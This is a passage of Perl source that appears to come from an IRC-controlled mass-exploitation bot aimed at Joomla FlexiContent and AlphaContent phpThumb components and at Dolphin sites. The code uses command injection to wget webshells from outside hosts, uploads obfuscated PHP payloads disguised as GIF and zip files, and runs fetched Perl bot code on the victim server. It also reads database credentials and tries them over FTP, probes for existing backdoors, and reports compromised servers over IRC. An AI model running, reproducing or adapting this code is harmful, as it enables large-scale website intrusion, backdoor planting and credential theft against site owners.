""; if ($html2 =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;} if ($html2 =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;} if ($html2 =~ m/OS : (.*?)<br>/) {$os = $1;} &msg("$admin","15$engine9 $crotb 15(OS=$os) $uid"); sleep(2); &msg("$channel","![7$engine]! [ 4SheLL 7Target Sent to 4$nick 9$safe $os ]"); } } sub post3() { my $target = $_[0]; my $code = "R0lGODlhPD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoc3RycmV2KHN0cl9yb3QxMygnPThUK3RQVE5xOE5COEhSbVVSZkxzL1FoMWVJWkRlTWVhc1hmVjZDUUx1UDVFZWxsRHZxSmJrN0x4eGZXRncwYWloKy84MUhzV3JFcERlYnM5b2p4VytyQm1NVjB0K0Z0bjIxVE9TcUxOSXZBNURQQjdnemlOZkRuSnRaRnNKWW9CUDVVMjRNRFROKytZYnFtQVEvR3pkdVBtalVPTkpBWVNWMFZrUFZlM0RTR0x6ZGI2ZFdPK2dkZmE0cVFabk5BVHBqa1pTVEQ4Y1M2MFcvSHk5a2xmeHRTUkpiRmpjWmg0L3VEaHUyanRwK3VNL1huQXhLN2RGOWE2QitPbWJNTXdtSS9lWkp0cEtTOUNDTkMrQnZhSWRnYTJramhnZGNhMC9VSGNhcmdYSlhwNG1Ea0gzT0Jsalg5ZVkrOEthcEdsSm82R0szZDZzS0JiNXpHS2gwWDNoMmRRZEhuL2tjb24xaFFkTktORy8xR0JjMzVaalhjSkNlRkJpeWdWN3BRbEtjZzhiV3RLQ2tvaFdleGU2SXk3RW0zSTRIMjQvUVIwQy95M2VuWjgxOUxwbTVXZmZYblZCU3lDL1JndVVsTml2Q1M5b04wSHJkRW5JWWxqeFJXdUM5ZmRwZG81RXMyMW9nbnNPM3Bja0wxbDRhbjErTW1CTWxjSS9YdkZqQjc1ZGY3QW02ZWdJcW85ektsd1BxSTI5MEhaSmUyMU9JNnlCU3FENzc4bi9ES3Vwbktwc0x2R3JsbEFLbVVDeEpDK0M4ZTNnZElnN0dUSG1DSThmb1NsbWppcDBHWHhFK3lMclJMbnNuVEtCbkptcnAxWGRlRlVwaE1ldXhtaEtBWXBySmNlcjcybWNkVkd5emUvMW9BMEhzQjdtck1WRWM5Rno1NnhHVDg5M2Fweit0Y1VyajM2MTNFY3I2SmIxMHBuM2g2SGFkZlpzOU1rY1lJN0tnYzFONUQ3S1RYK3B6TXBybEZJM1V3dFg3enl6SWFnckZzVEh1Q20ya3Vzcm1DY25xOFFNOGMvcnBNWm1nKzYxVWNVM2RkQUVsNjJqSW42SWNwMmFuemliK215amYwb1orQ2dVNy9VeWdSc0RpbytYQXFvMzRZQTJ2SjNlemNyNjhKY0RrYy9yd3AwVExzbzhUMm5sQTlZM2VVejNrRzE3c3haUHNsb3M1MDdpQkJEV1NqL3FVTU1YbGorRE5QbTUrdVh2V2laWHlhNUhxdDdYcGlpR09hRjV4VitwSEFjVVZwZ0hVb3czc3dyTGRsSW1LWU1zSG56djJlZGI3V2tTSDBJTTl0KzQ4alhmQnFtOTRUNFMxYVFrNTVyT3VEK1FhemNvZUJpTnNjbURTckhkRTJ4Q1VBQWNFSkVmT0VDS0puUldoZmdsMEE2dHBBSlVMVjVsY3FLMnlDVFlGSEI2Z1VaVWxxQVBKa0pMcVFPRmFvNnF6aGNZTmJPMFdha0RZMVdBUFV2dVhhRTZ2NUhDUkVDSkVXRnR4NW8zTzJMNEtod0lKZmM1ZFBITFhmMjFPcVhKQkR2cXpSL3FFRDFtbkdGaFFMaFJwWTdRV3B4UmlmQ05BSlBkTXg5U1hFYVJpSjhqVUZUUkVTWnZvYUNVbERlbG9EYXhyUkIwVm9sdE91MjNKdEVEdVdvN2ZhZXVKcjMvZ3JLZkR0WEVMcWRsa1QzOFBJOWZzeWNhcWVVTWZTdTNFRWt0VjA4bFFLL3dEanYva1B2N1BnTGFtYjh2dWZoNEZXc2tJVXpub1JLU2pBM3RKMVBsTWVNclM2ci93V1dmdHYzYkRwZzFhQUJzSGorMEkwT1lHQ0JqQ1Rnc1ZWdksxcDNTUlRiTFNOTXBERWwzdm05b1JKdmt6VUNvWmxTL1JIK2pBNnBIUmpBeGc5b2pUU01JUVM0TzBwK21LdlBUdjljM3laMG1oUDYzdHVSeVdEc0ZGOGMzUHkyZ094U2lIZXUydzRJbVE3WjIwUnhvU09NTTAvWWhxaFJKaGlXRGJHWVppdlNRQkl0czBTZTFyQXc2VEphSkU2VHhRZUlXeXZMOXZqNVZQNjM5QUR0am55ZER5dWV1WWhNd3o3UFFyRFlpWHhUb09WYmpLVHZnalFraFNhZm5POUVnNlREZVBjTmVNS2tVZEJvVUNWcEFid1BhSEMwdXBvWFpkeVRQL3BNQWVOSVBWL1lQS3ZJYzZ2LzlIYkdBR2s2YlNlUFFWWEplaDVHYllYSHF4eVZOOGJRYVFoVEFwQmt6WnlPOWdWcElIeGkyQUlxUms1V0ljTFR0UE82RHVOV28rVlVscEluUzlWdVhRWlVRNXVpTlJXZWtodVZCbFQrMlFycGZrNGhqaG84TGJHUk5OM0tJTkJiZU1GQmZrMGZtdHFUbHBhTlJnVCtjV2toRzdwYnNUMm44RktnUW5uelFxaHNqSHp6dnBGb05YUnNtc1BMRy9Wd2tGdkZxbFEwYVhrd1BvSGpkUHd2ek1jK2xicCt5VjZFSjgrUFloaGZ4VjRNbkswZmZ4ejdBNkh6NEFUM241MHhZSmhIWUJEa1pLbFVaQkNyYnpXYk9VOUNIWk1laWsxaDFIaEt6UkJISFQ5UXE1U3ZzaE51NzJxdnBoeUxWYitSNTFEU3E5SHlXL0M4cVNVWE5vSkZIazVTRTY3WUwxMHhKS2drWHRBU0tMc0pIdkZJNjExZ2dodEhwOXNESEZ4Ly8yZ0RpcGhIQlh4end5SWdWQmwxSmZiWE9Gb3JoN1RCZ1BXR1RZSk9RNzBYc3QxbDBOSnBTNndEUHVPRzB2Z0ttRVN4d0tFU0hkUmt0ckI4QVdTUG45UUpUMEQwdTBNWDJHR2s2Znk4OGJIYkVCSmpMUHh4OTdNVG5yb0d2V2VubE84Z2tQSUpSK215QnlOeHN4Zzc0dCt6Z2Y5aHRha1puUkttUmxmSTMxTUJUU3BpRDB0VllpTjQ0R3U0dS92NUpyTEtCcnhrZ2JiSkZnYi9GemRHdE95VHdiNkp4YzZrUmdVZ0ZDZ1UwUXFLTXVnMG81aStrSWhsY0xoaWtjL3VPZmdhcU43K2ZFVkF1dnp2emh1d2hFV1RTRGtGcHZGNXJNWTlpb2pjWE1FRHY3ZXV0OFViS0VjWFZ4Zmh0cWs2Q05rcGtjWEE0cG1URHNWeW5peU5XU3I0ZHo0cDV2NXZTWXQyMDgzQmlxWC9DaWdDL0o3YzNXdXRUeXdUTU42UTJWdklEVkZKU01Zay9PUGtDbDU4Z0wybTYwYjZFbVcveWVNZXpvUUZCcmZGRnR0UnFQcXdYMGdkSzFUSTNlR3llWUVsZVU4SitwR1pWME5qUFdwY3F2N2dvWFR3U2k4dDRDUjFsVkd5WjFVMHZSQWprWXRpWXRHaktVZFZ4dWlFUitTY240cnZjaFMxYWtpRUhwNURMZVY0VS81bmdoZDZUdlc2aUhidjJrUktTUTNqbEZwTDRycWw0U1N1WHcrRzZHckdUWjFSbWdiRVlQNnFaTkpDTTJoUkozTmlHM1VwenY0d09iUHBPdUJoNm55cmppUnVMREtwSFVScFVDMzBJOUVOc09vZ0xlUTNiU0w5M0wwM1FoNWo2Z2t6RjA4S0RSbW8ydjRvU09UblZ6cmJkdklidWhOS2NjN1pYRmRQRTk1a01HcmYwa2Frak5MeW5WcDBQRnhUQ1NxQkpQUEV3TkF0RDhZRW90WkdMZ1BWZGhxUVgremRsajNPMXBBWDZYYmJNZXpmM1NwVnpHNTJSUVg2MWMrQTJCMCsyQlBpVVpna2FMOHFyaVVxZU0xbnA5ZW55N0s2cEVoRkdrOVp0SytZbWRSTnZYaGFNZEZ2bXVFYlcrN3RsUWFGbU1Ga0MyVnNna0FnaHFicWdMeHVjQ1hvV2JWSTFzUmM0VVIzRXpZbUNqaXp4dCtTZkF5UjBDRWhlOHRxMzk5TVAyck4vUjl0M1Uyb1Q2aEdBMHF1VnYvRDJjZlB5dEJzdzJsaUdCcDl5amsvaWlESnVaUkdwQ1IvUEU2MEdDcUFXU0pVKzJ1aTlDdCtDYzlpYnE0b3cvbTl5TDJVaGwveFI2M3BZNWF3MW5mRzlBTUhnc1FnVmJ3bVFsY3NhYmlzMFlDc2JhT2o3UzF0M1lhNnFsYlV2QnlORXVMdktxWXRDZ1Jib1lyTWRqR1VqbWJQejQxQWZidU1GbHF0Y1dDMFZ4dGFCNnQ3WXFDckJKamIwRmxOV0pBTXc0UVdBb0NPdDFVY3dJUVNlOXpIK1JoLy9WKzVDcnR4a2R3QzhqQ2tCMjN2NGNFK0ZpWGJUQTZxQ2J3eVZPdnpIcVlJS0k5SXVIUDZSdy9NemNXVG1veWhvbmx6VXQ1MW5yNlNoNERlcUVKcWtsd0J6SFpBNkFZaVpQVHFYYk9xR0JPMmlnY3dUM0dBNGlSTGdnSWN3SW0nKSkpKSk7DQo/Pg=="; my $browser = LWP::UserAgent->new; my $res = $browser->post($target."./style.php",['style.php'=> $code => 'application/octet-stream'],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub flexi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$privlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $agent->timeout(10); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101Firefox/14.0.1'); my $shell = "wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O up.txt;wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.php"; my $website = "http://".$site."components/com_flexicontent/librairies/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ; &phpThumbDebug=9"; my $request = $agent->request(HTTP::Request->new(GET=>$website)); my $cwebsite = "http://".$site."components/com_flexicontent/librairies/phpThumb/up.txt"; my $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success) { #&msg("$chanxxx","![7$engine]! [ 4,1Not VulNeRabLe http://".$site." ] "); &shellx1($chan,$site,$engine,$nick,$logo); my $mvwebsite = "http://".$site."components/com_flexicontent/librairies/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv up.txt style.php ; &phpThumbDebug=9"; my $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); my $cwebsite = "http://".$site."components/com_flexicontent/librairies/phpThumb/style.php"; my $c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($c2req->is_success) { my $checker = &get_content($cwebsite."?cek"); sleep(2); if ($checker =~ m/404 Not Found/ig) { &msg("$channel","![7$engine]! [ 9VulNeRabLe ] "); sleep(2); my $safe = ""; my $os = ""; my $uid = ""; if ($checker =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($checker =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($checker =~ /User : (.*?)<\/b>/){$uid=$1;} my $server = encode_base64($os); my $sender = "".$timrid."?png=".$site."&server=".$server."&shell=".$cwebsite."&exploit=Flexicontent"; &get_content($sender); &msg("$admin","$privlogo 3$engine 3$cwebsite 9$safe 14$os"); &msg("$channel","![7$engine]! [ 12sHeLL ^_^ 2 $safe $os $uid ]"); } } } } } } sub alpha_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$privlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $agent = LWP::UserAgent->new(); $agent->timeout(10); $agent->agent($useragent); my $shell = "wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O up.jpg;wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -O style.php"; my $website = "http://".$site."components/com_alphacontent/assets/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ; &phpThumbDebug=9"; my $request = $agent->request(HTTP::Request->new(GET=>$website)); my $cwebsite = "http://".$site."components/com_alphacontent/assets/phpThumb/up.jpg"; my $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($creq->is_success) { &shellx1($chan,$site,$engine,$nick,$logo); my $mvwebsite = "http://".$site."components/com_alphacontent/assets/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv up.jpg style.php ; &phpThumbDebug=9"; my $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite)); my $cwebsite = "http://".$site."components/com_alphacontent/assets/phpThumb/style.php"; #my $cwebsite1 = "http://".$site."/plugins/editors/index.php"; my $c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite)); if ($c2req->is_success) { #&msg("$chanxxx","![9X]! 10$site [ 3* ]"); sleep(3); my $checker = &get_content("http://".$site."components/com_alphacontent/assets/phpThumb/style.php?love"); sleep(2); if ($checker =~ m/404 Not Found/ig) { &msg("$channel","![7$engine]! [ 9VulNeRabLe ] "); sleep(3); &msg("$channel","![7$engine]! [ 9UploAdinG 3Data ] "); sleep(3); my $safe = ""; my $os = ""; my $uid = ""; if ($checker =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($checker =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($checker =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$privlogo 3$engine 3$cwebsite 9$safe 14$os"); &msg("$channel","![7$engine]! [ 12sHeLL ^_^ 2 $safe $os $uid ]"); } } } else { my @bdpath = ("components/com_alphacontent/assets/phpThumb/style.php", "components/com_alphacontent/assets/phpThumb/pagat.php", "components/com_alphacontent/assets/phpThumb/bogel.php", "components/com_alphacontent/assets/phpThumb/style.jpg", "components/com_alphacontent/assets/phpThumb/magic.php", "components/com_alphacontent/assets/phpThumb/caliber.php", "components/com_alphacontent/assets/phpThumb/.grv.php", "images/stories/petx.pHp", "magic.gif.php", ); my @result = &backdoorCheck($site,@bdpath); if($result[0] ne "false") { sleep(int(rand(3))); &msg("$channel","![7$engine]! [ 4Finder Success 3OK! ]"); &msg("$admin","15[4+12$engine4+15] 11$result[0] OS: $result[1] SAFEMODE:4$result[2] "); } } } } } sub shellx1() { my $chan = $_[0]; my $site = $_[1]; my $engine = $_[2]; my $nick = $_[3]; my $logo = $_[4]; my $crota = "http://".$site."/style.php"; my $crotb = "http://".$site."/style.php"; &alpha_post2("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../style.php);'); my $html = &get_content($crota."?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/docx.txt%20;%20perl%20docx.txt%20;%20rm%20-rf%20doc*"); my $html2 = &get_content($crotb."?220=cd%20/tmp%20;wget%20http://wordpress.com.fce-eth.org/docx.txt%20;%20perl%20docx.txt%20;%20rm%20-rf%20doc*"); if ($html =~ /GIF89a/) { &get_content($crota); sleep(3); my $safe = ""; my $os = ""; my $uid = ""; if ($html =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$channel","![7$engine]! [ 8SheLL 2Target Sent to 12$nick 9$safe $os ]"); &msg("$admin","$vdlogo 15$engine3 [Success]9 $crota 15(OS=$os) $uid "); sleep(2); } if ($html2 =~ /GIF89a/) { &get_content($crotb); my $safe = ""; my $os = ""; my $uid = ""; if ($html2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($html2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($html2 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","15$engine9 $crotb 15(OS=$os) $uid"); sleep(2); &msg("$channel","![7$engine]! [ 4SheLL 7Target Sent to 4$nick 9$safe $os ]"); } } sub alpha_post2() { my $target = $_[0]; my $code = "R0lGODlhPD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoc3RycmV2KHN0cl9yb3QxMygnPThUK3RQVE5xOE5COEhSbVVSZkxzL1FoMWVJWkRlTWVhc1hmVjZDUUx1UDVFZWxsRHZxSmJrN0x4eGZXRncwYWloKy84MUhzV3JFcERlYnM5b2p4VytyQm1NVjB0K0Z0bjIxVE9TcUxOSXZBNURQQjdnemlOZkRuSnRaRnNKWW9CUDVVMjRNRFROKytZYnFtQVEvR3pkdVBtalVPTkpBWVNWMFZrUFZlM0RTR0x6ZGI2ZFdPK2dkZmE0cVFabk5BVHBqa1pTVEQ4Y1M2MFcvSHk5a2xmeHRTUkpiRmpjWmg0L3VEaHUyanRwK3VNL1huQXhLN2RGOWE2QitPbWJNTXdtSS9lWkp0cEtTOUNDTkMrQnZhSWRnYTJramhnZGNhMC9VSGNhcmdYSlhwNG1Ea0gzT0Jsalg5ZVkrOEthcEdsSm82R0szZDZzS0JiNXpHS2gwWDNoMmRRZEhuL2tjb24xaFFkTktORy8xR0JjMzVaalhjSkNlRkJpeWdWN3BRbEtjZzhiV3RLQ2tvaFdleGU2SXk3RW0zSTRIMjQvUVIwQy95M2VuWjgxOUxwbTVXZmZYblZCU3lDL1JndVVsTml2Q1M5b04wSHJkRW5JWWxqeFJXdUM5ZmRwZG81RXMyMW9nbnNPM3Bja0wxbDRhbjErTW1CTWxjSS9YdkZqQjc1ZGY3QW02ZWdJcW85ektsd1BxSTI5MEhaSmUyMU9JNnlCU3FENzc4bi9ES3Vwbktwc0x2R3JsbEFLbVVDeEpDK0M4ZTNnZElnN0dUSG1DSThmb1NsbWppcDBHWHhFK3lMclJMbnNuVEtCbkptcnAxWGRlRlVwaE1ldXhtaEtBWXBySmNlcjcybWNkVkd5emUvMW9BMEhzQjdtck1WRWM5Rno1NnhHVDg5M2Fweit0Y1VyajM2MTNFY3I2SmIxMHBuM2g2SGFkZlpzOU1rY1lJN0tnYzFONUQ3S1RYK3B6TXBybEZJM1V3dFg3enl6SWFnckZzVEh1Q20ya3Vzcm1DY25xOFFNOGMvcnBNWm1nKzYxVWNVM2RkQUVsNjJqSW42SWNwMmFuemliK215amYwb1orQ2dVNy9VeWdSc0RpbytYQXFvMzRZQTJ2SjNlemNyNjhKY0RrYy9yd3AwVExzbzhUMm5sQTlZM2VVejNrRzE3c3haUHNsb3M1MDdpQkJEV1NqL3FVTU1YbGorRE5QbTUrdVh2V2laWHlhNUhxdDdYcGlpR09hRjV4VitwSEFjVVZwZ0hVb3czc3dyTGRsSW1LWU1zSG56djJlZGI3V2tTSDBJTTl0KzQ4alhmQnFtOTRUNFMxYVFrNTVyT3VEK1FhemNvZUJpTnNjbURTckhkRTJ4Q1VBQWNFSkVmT0VDS0puUldoZmdsMEE2dHBBSlVMVjVsY3FLMnlDVFlGSEI2Z1VaVWxxQVBKa0pMcVFPRmFvNnF6aGNZTmJPMFdha0RZMVdBUFV2dVhhRTZ2NUhDUkVDSkVXRnR4NW8zTzJMNEtod0lKZmM1ZFBITFhmMjFPcVhKQkR2cXpSL3FFRDFtbkdGaFFMaFJwWTdRV3B4UmlmQ05BSlBkTXg5U1hFYVJpSjhqVUZUUkVTWnZvYUNVbERlbG9EYXhyUkIwVm9sdE91MjNKdEVEdVdvN2ZhZXVKcjMvZ3JLZkR0WEVMcWRsa1QzOFBJOWZzeWNhcWVVTWZTdTNFRWt0VjA4bFFLL3dEanYva1B2N1BnTGFtYjh2dWZoNEZXc2tJVXpub1JLU2pBM3RKMVBsTWVNclM2ci93V1dmdHYzYkRwZzFhQUJzSGorMEkwT1lHQ0JqQ1Rnc1ZWdksxcDNTUlRiTFNOTXBERWwzdm05b1JKdmt6VUNvWmxTL1JIK2pBNnBIUmpBeGc5b2pUU01JUVM0TzBwK21LdlBUdjljM3laMG1oUDYzdHVSeVdEc0ZGOGMzUHkyZ094U2lIZXUydzRJbVE3WjIwUnhvU09NTTAvWWhxaFJKaGlXRGJHWVppdlNRQkl0czBTZTFyQXc2VEphSkU2VHhRZUlXeXZMOXZqNVZQNjM5QUR0am55ZER5dWV1WWhNd3o3UFFyRFlpWHhUb09WYmpLVHZnalFraFNhZm5POUVnNlREZVBjTmVNS2tVZEJvVUNWcEFid1BhSEMwdXBvWFpkeVRQL3BNQWVOSVBWL1lQS3ZJYzZ2LzlIYkdBR2s2YlNlUFFWWEplaDVHYllYSHF4eVZOOGJRYVFoVEFwQmt6WnlPOWdWcElIeGkyQUlxUms1V0ljTFR0UE82RHVOV28rVlVscEluUzlWdVhRWlVRNXVpTlJXZWtodVZCbFQrMlFycGZrNGhqaG84TGJHUk5OM0tJTkJiZU1GQmZrMGZtdHFUbHBhTlJnVCtjV2toRzdwYnNUMm44RktnUW5uelFxaHNqSHp6dnBGb05YUnNtc1BMRy9Wd2tGdkZxbFEwYVhrd1BvSGpkUHd2ek1jK2xicCt5VjZFSjgrUFloaGZ4VjRNbkswZmZ4ejdBNkh6NEFUM241MHhZSmhIWUJEa1pLbFVaQkNyYnpXYk9VOUNIWk1laWsxaDFIaEt6UkJISFQ5UXE1U3ZzaE51NzJxdnBoeUxWYitSNTFEU3E5SHlXL0M4cVNVWE5vSkZIazVTRTY3WUwxMHhKS2drWHRBU0tMc0pIdkZJNjExZ2dodEhwOXNESEZ4Ly8yZ0RpcGhIQlh4end5SWdWQmwxSmZiWE9Gb3JoN1RCZ1BXR1RZSk9RNzBYc3QxbDBOSnBTNndEUHVPRzB2Z0ttRVN4d0tFU0hkUmt0ckI4QVdTUG45UUpUMEQwdTBNWDJHR2s2Znk4OGJIYkVCSmpMUHh4OTdNVG5yb0d2V2VubE84Z2tQSUpSK215QnlOeHN4Zzc0dCt6Z2Y5aHRha1puUkttUmxmSTMxTUJUU3BpRDB0VllpTjQ0R3U0dS92NUpyTEtCcnhrZ2JiSkZnYi9GemRHdE95VHdiNkp4YzZrUmdVZ0ZDZ1UwUXFLTXVnMG81aStrSWhsY0xoaWtjL3VPZmdhcU43K2ZFVkF1dnp2emh1d2hFV1RTRGtGcHZGNXJNWTlpb2pjWE1FRHY3ZXV0OFViS0VjWFZ4Zmh0cWs2Q05rcGtjWEE0cG1URHNWeW5peU5XU3I0ZHo0cDV2NXZTWXQyMDgzQmlxWC9DaWdDL0o3YzNXdXRUeXdUTU42UTJWdklEVkZKU01Zay9PUGtDbDU4Z0wybTYwYjZFbVcveWVNZXpvUUZCcmZGRnR0UnFQcXdYMGdkSzFUSTNlR3llWUVsZVU4SitwR1pWME5qUFdwY3F2N2dvWFR3U2k4dDRDUjFsVkd5WjFVMHZSQWprWXRpWXRHaktVZFZ4dWlFUitTY240cnZjaFMxYWtpRUhwNURMZVY0VS81bmdoZDZUdlc2aUhidjJrUktTUTNqbEZwTDRycWw0U1N1WHcrRzZHckdUWjFSbWdiRVlQNnFaTkpDTTJoUkozTmlHM1VwenY0d09iUHBPdUJoNm55cmppUnVMREtwSFVScFVDMzBJOUVOc09vZ0xlUTNiU0w5M0wwM1FoNWo2Z2t6RjA4S0RSbW8ydjRvU09UblZ6cmJkdklidWhOS2NjN1pYRmRQRTk1a01HcmYwa2Frak5MeW5WcDBQRnhUQ1NxQkpQUEV3TkF0RDhZRW90WkdMZ1BWZGhxUVgremRsajNPMXBBWDZYYmJNZXpmM1NwVnpHNTJSUVg2MWMrQTJCMCsyQlBpVVpna2FMOHFyaVVxZU0xbnA5ZW55N0s2cEVoRkdrOVp0SytZbWRSTnZYaGFNZEZ2bXVFYlcrN3RsUWFGbU1Ga0MyVnNna0FnaHFicWdMeHVjQ1hvV2JWSTFzUmM0VVIzRXpZbUNqaXp4dCtTZkF5UjBDRWhlOHRxMzk5TVAyck4vUjl0M1Uyb1Q2aEdBMHF1VnYvRDJjZlB5dEJzdzJsaUdCcDl5amsvaWlESnVaUkdwQ1IvUEU2MEdDcUFXU0pVKzJ1aTlDdCtDYzlpYnE0b3cvbTl5TDJVaGwveFI2M3BZNWF3MW5mRzlBTUhnc1FnVmJ3bVFsY3NhYmlzMFlDc2JhT2o3UzF0M1lhNnFsYlV2QnlORXVMdktxWXRDZ1Jib1lyTWRqR1VqbWJQejQxQWZidU1GbHF0Y1dDMFZ4dGFCNnQ3WXFDckJKamIwRmxOV0pBTXc0UVdBb0NPdDFVY3dJUVNlOXpIK1JoLy9WKzVDcnR4a2R3QzhqQ2tCMjN2NGNFK0ZpWGJUQTZxQ2J3eVZPdnpIcVlJS0k5SXVIUDZSdy9NemNXVG1veWhvbmx6VXQ1MW5yNlNoNERlcUVKcWtsd0J6SFpBNkFZaVpQVHFYYk9xR0JPMmlnY3dUM0dBNGlSTGdnSWN3SW0nKSkpKSk7DQo/Pg=="; my $browser = LWP::UserAgent->new; my $res = $browser->post($target."./style.php",['style.php'=> $code => 'application/octet-stream'],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub dolphin_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$dollogo); my $num = scalar(@list); if ($num > 0) { foreach my $site (@list) { $count++; if ($count == $num-1) { &msg("$channel","![7$engine :7 Process :12 $$ ]! [11 Done.. ]"); } my $h1 = "---------------------------"; my $h2 = 'Content-Disposition: form-data; name="submit_upload"'; my $h3 = 'Content-Disposition: form-data; name="csrf_token"'; my $h4 = 'Content-Disposition: form-data; name="module"; filename="0x4148.zip"'; my $h5 = 'Content-Type: application/zip'; my $evil = "PK\x03\x04\x0a\x00\x00\x00\x00\x00RanIj\xf0\xfdU1\x00\x00\x001\x00\x00\x00\x0c\x00\x00\x000x4148fo.php<?php\x0d\x0aeval(base64_decode(\$_POST['0x4148']));\x0d\x0a?>PK\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00RanIj\xf0\xfdU1\x00\x00\x001\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x00\x00\x00\x00\x00\x00\x000x4148fo.phpPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00:\x00\x00\x00[\x00\x00\x00\x00\x00"; my $body = "$h1--\r\n$h2\r\n\r\n0x4148\r\n$h1--\r\n$h3\r\n\r\nAint give a shit about csrf stuff ;)\r\n$h1--\r\n$h4\r\n$h5\r\n\r\n$evil\r\n$h1----\r\n"; my $conle = length($body); my $vuln = "http://".$site.$bug; if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { my $inject = &dolphin($vuln,$body); if ($inject =~ /HTTP\/1.1 200 OK/) { my $tes = &dol_query("http://".$site,'echo "style:OS: ".php_uname()." BlackClovers";'); if ($tes =~ /style:OS: (.*) BlackClovers/) { $os = $1; #&msg("$chanxxx","![7$engine]! [ 11Sending payload to $site]"); my $shell = "http://".$site."style.php"; my $shell2 = "http://".$site."tmp/style.php"; &dol_query("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../style.php");'); &dol_query("http://".$site,'system("wget http://www.soaresrama.pt/wp-includes/fonts/eaxt/info.aff -q -O ../tmp/style.php");'); &msg("$channel","![7$engine]! [ 12payload was send ]"); my $check = &get_content($shell."?cek"); &get_all($shell."?cek"); my $check2 = &get_content($shell2."?cek"); &get_all($shell2."?cek"); if ($check =~ m/404 Not Found/ig){ my ($safe,$os,$uid); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$dolphinlogo5[4-5=4[8$engine4]5=4-5] 4 $shell 14[3$os14][3safemode10:3$safe14]"); sleep(5); &msg("$channel","![7$engine]! [ 11Private Shell ] [ 0$os $uid ]"); sleep(2); } elsif ($check2 =~ m/404 Not Found/ig){ my ($safe,$os,$uid); if ($check2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check2 =~ /User : (.*?)<\/b>/){$uid=$1;} &msg("$admin","$dolphinlogo5[4-5=4[8$engine4]5=4-5] 4 $shell2 14[3$os14][3safemode10:3$safe14]"); sleep(5); &msg("$channel","![7$engine]! [ 11Private Shell ] [ 0$os $uid ]"); sleep(2); } else { &msg("$channel","![7$engine]! [ 11Private Shell ] [ 0$os : OFF petology BlackClovers ]"); sleep(5); } my $user = &dol_query("http://".$site,"include('../inc/header.inc.php'); echo \$db['user'];"); if ($user =~ /_/) { @userz = split(/_/,$user); $user = $userz[0]; } my $pass = &dol_query("http://".$site,"include('../inc/header.inc.php'); echo \$db['passwd'];"); &msg("$admin","11,1FTP <=> Checking $site | $user : $pass "); &ftp_connect($site,$user,$pass,$path,$logo,0); } else { my @bdpath = ("/media/roin.php", "/webconf.php", "/VR46.php", "/clone.php", "../clone.php", "/rainbow.php", "tmp/rainbow.php", "../rainbow.php", "flash/wp-simple.php", "tmp/0x4148fo.php" ); my @result = &backdoorCheck($site,@bdpath); if($result[0] ne "false") { 